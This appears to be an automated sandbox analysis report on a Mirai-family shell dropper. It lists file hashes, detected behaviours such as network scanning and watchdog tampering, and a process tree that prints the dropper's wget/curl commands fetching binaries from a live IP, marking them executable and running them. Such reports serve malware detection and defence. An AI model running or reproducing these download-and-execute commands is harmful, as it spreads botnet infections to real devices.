Analysis
-
max time kernel
150s -
max time network
155s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28-11-2024 02:40
Static task
static1
Behavioral task
behavioral1
Sample
4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh
-
Size
1KB
-
MD5
ea3e4ce3ad906187d77f71fd511caca5
-
SHA1
1826d8941b0d1aaa76fdade685e66e31e3732399
-
SHA256
4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621
-
SHA512
e9ac3561d6872982e7647f162635fe522c9abca8ca686d2f4853f62ae099c9b4a9f43076fc8f96ce2fc17d2dc02eb10067d811db34dc039c9a8761457830d9f7
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
Contacts a large (17578) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 734 chmod 743 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /tmp/byte 735 byte /tmp/byte 744 byte -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog byte File opened for modification /dev/misc/watchdog byte -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for reading /proc/472/net/tcp byte File opened for reading /proc/18/cmdline byte File opened for reading /proc/707/cmdline byte File opened for reading /proc/830/net/tcp byte File opened for reading /proc/713/net/tcp byte File opened for reading /proc/71/cmdline byte File opened for reading /proc/840/net/tcp byte File opened for reading /proc/847/cmdline byte File opened for reading /proc/2/cmdline byte File opened for reading /proc/809/cmdline byte File opened for reading /proc/13/cmdline byte File opened for reading /proc/795/net/tcp byte File opened for reading /proc/830/cmdline byte File opened for reading /proc/796/net/tcp byte File opened for reading /proc/801/cmdline byte File opened for reading /proc/815/net/tcp byte File opened for reading /proc/778/cmdline byte File opened for reading /proc/703/exe byte File opened for reading /proc/749/cmdline byte File opened for reading /proc/698/net/tcp byte File opened for reading /proc/839/net/tcp byte File opened for reading /proc/12/cmdline byte File opened for reading /proc/793/net/tcp byte File opened for reading /proc/832/cmdline byte File opened for reading /proc/326/net/tcp byte File opened for reading /proc/799/net/tcp byte File opened for reading /proc/702/exe byte File opened for reading /proc/821/net/tcp byte File opened for reading /proc/862/cmdline byte File opened for reading /proc/863/net/tcp byte File opened for reading /proc/24/cmdline byte File opened for reading /proc/797/net/tcp byte File opened for reading /proc/818/net/tcp byte File opened for reading /proc/841/net/tcp byte File opened for reading /proc/683/net/tcp byte File opened for reading /proc/707/net/tcp byte File opened for reading /proc/19/cmdline byte File opened for reading /proc/791/net/tcp byte File opened for reading /proc/1/net/tcp byte File opened for reading /proc/770/cmdline byte File opened for reading /proc/808/net/tcp byte File opened for reading /proc/825/cmdline byte File opened for reading /proc/827/net/tcp byte File opened for reading /proc/833/net/tcp byte File opened for reading /proc/835/net/tcp byte File opened for reading /proc/814/cmdline byte File opened for reading /proc/852/net/tcp byte File opened for reading /proc/704/cmdline byte File opened for reading /proc/813/net/tcp byte File opened for reading /proc/817/net/tcp byte File opened for reading /proc/822/net/tcp byte File opened for reading /proc/16/cmdline byte File opened for reading /proc/747/cmdline byte File opened for reading /proc/776/net/tcp byte File opened for reading /proc/804/cmdline byte File opened for reading /proc/843/net/tcp byte File opened for reading /proc/853/net/tcp byte File opened for reading /proc/320/net/tcp byte File opened for reading /proc/789/net/tcp byte File opened for reading /proc/805/cmdline byte File opened for reading /proc/813/cmdline byte File opened for reading /proc/15/cmdline byte File opened for reading /proc/702/cmdline byte File opened for reading /proc/789/cmdline byte -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 739 wget 741 curl 742 cat -
Writes file to tmp directory 5 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/byte.mips wget File opened for modification /tmp/byte.mips curl File opened for modification /tmp/byte.x86 wget File opened for modification /tmp/byte.x86 curl File opened for modification /tmp/byte 4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh
Processes
-
/tmp/4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh/tmp/4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh1⤵
- Writes file to tmp directory
PID:705 -
/usr/bin/wgetwget http://154.216.20.149/bins/byte.x862⤵
- Writes file to tmp directory
PID:712
-
-
/usr/bin/curlcurl -O http://154.216.20.149/bins/byte.x862⤵
- Writes file to tmp directory
PID:720
-
-
/bin/catcat byte.x862⤵PID:732
-
-
/bin/chmodchmod +x 4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh byte byte.x86 systemd-private-a2e7d5acfbb942e5ade51a566385727f-systemd-timedated.service-ZiTqdl2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/byte./byte byte.dvr2⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm -rf byte2⤵PID:737
-
-
/usr/bin/wgetwget http://154.216.20.149/bins/byte.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:739
-
-
/usr/bin/curlcurl -O http://154.216.20.149/bins/byte.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:741
-
-
/bin/catcat byte.mips2⤵
- System Network Configuration Discovery
PID:742
-
-
/bin/chmodchmod +x 4c6c8e440abf92183fe6f69a2623571374a64efdf1509a84f858495bf0ff6621.sh byte byte.mips byte.x86 systemd-private-a2e7d5acfbb942e5ade51a566385727f-systemd-timedated.service-ZiTqdl2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/byte./byte byte.dvr2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads runtime system information
PID:744
-
-
/bin/rmrm -rf byte2⤵PID:748
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
137KB
MD5442269900f28ef10d8b7a13f2bc5ed86
SHA12f997966590600fb4b5572f306a40bcbb6fe79eb
SHA256a1badb5317009fe55702c638b0c5816a92337e855e83db12e99e721db7b193c3
SHA512d861babc3d83bf705aa5efd5276e928d6335eabfe58c604968315f865ae1765fe9b099b21de8045b3acfc6b66b5c384ec39888dd72d69bc4105703cff9e19db1
-
Filesize
95KB
MD534ef09c6bfa12c8bb0a4eb1111163f49
SHA1374e5712df7fba870afd7c7897c5bc23ba205f61
SHA256537907609ffc903d04b1aa5309d9bd02b95a31f343763ae83cd61f9c1b797438
SHA5124aecdc6165268aa3a214581b5bb1311ebd17b9a7f573fc45a914fd3c1b7c38faffbe7ca21628ca37752417c8270a66fa34d544a4e315271f462dd31953bd902f